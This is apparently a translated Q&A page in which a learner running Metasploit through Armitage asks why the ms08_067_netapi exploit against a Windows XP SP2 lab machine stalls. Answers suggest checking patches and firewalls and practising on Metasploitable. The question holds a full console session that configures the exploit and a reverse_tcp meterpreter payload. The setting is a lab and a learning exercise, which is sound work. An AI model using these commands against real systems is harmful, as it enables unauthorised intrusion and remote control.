0

我正在学习从 Armitage 开始的 Metasploit 框架,以大致了解结构等。我试图破解旧的 Windowx XP sp2,当我尝试运行漏洞利用程序时,我得到了这个

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set LHOST 192.168.18.130
LHOST => 192.168.18.130
msf  exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf  exploit(ms08_067_netapi) > set LPORT 13592
LPORT => 13592
msf  exploit(ms08_067_netapi) > set RHOST 10.0.0.11
RHOST => 10.0.0.11
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf  exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf  exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.18.130:13592
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...

我没有收到任何错误,但它停在那里并且没有执行漏洞利用。

4

2 回答 2

1

因此,该漏洞利用似乎不适用于您拥有的 Windows 版本。也许你可以尝试另一个,更简单的。这些漏洞是什么时候产生的?您确定它们在您的 Windows 版本中未打补丁吗?

如果你想从运行其他人编写的漏洞利用脚本中学到任何东西,你必须开始调试并尝试了解脚本在做什么。在它说完之后找出脚本到底在做什么,Attempting to trigger the vulnerability并尝试找出它可能不起作用的原因。这里有太多的可能性可以推测。

于 2013-12-18T05:58:46.170 回答
0

我写了阿米蒂奇。这里有几件事要记住:

  • ms08_067_netapi 是针对未打补丁的 Windows XP 系统的可靠利用。但是,远程漏洞利用可能会出现许多问题。尝试重新启动目标系统并确保基于主机的防火墙已关闭。如果还是不行,可能是你的 XP 系统打了补丁。耸耸肩

  • 我注意到这篇 SO 帖子的标题是指 BackTrack Linux。BackTrack Linux 不再支持 Armitage。Metasploit 框架在 2013 年 4 月经历了重大的依赖关系转变,打破了 BackTrack Linux 环境。考虑迁移到 Kali Linux。这是 BackTrack Linux 的继任者。

Google for Kali Linux [我没有“声誉”点给你两个以上的链接]

  • Armitage 和 Metasploit 框架的最佳“第一个目标”是 Metasploitable。这是一个免费的 Linux 虚拟机,由 Metasploit 团队提供。它内置了几个漏洞和错误配置。可在此处下载:

http://sourceforge.net/projects/metasploitable/files/Metasploitable2/

  • 我写了一个 Armitage 入门教程。本教程将带您了解一些针对 Metasploitable 虚拟机的攻击:

http://blog.strategiccyber.com/2013/02/06/getting-started-with-armitage-and-the-metasploit-framework-2013/

于 2013-12-19T16:49:45.110 回答